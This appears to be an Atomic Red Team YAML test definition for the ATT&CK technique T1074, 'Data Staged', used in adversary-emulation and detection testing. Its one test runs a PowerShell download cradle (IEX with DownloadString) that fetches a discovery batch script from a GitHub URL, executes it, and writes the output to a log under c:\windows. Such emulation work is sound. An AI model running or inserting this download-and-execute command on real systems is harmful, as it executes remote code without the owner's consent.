atomic-red-team/atomics/T1074/T1074.yaml

---
attack_technique: T1074
display_name: Data Staged

atomic_tests:
- name: Stage data from Discovery.bat
  description: |
    Utilize powershell to download discovery.bat and save to a local file

  supported_platforms:
    - windows

  executor:
    name: powershell
    command: |
      powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > c:\windows\pi.log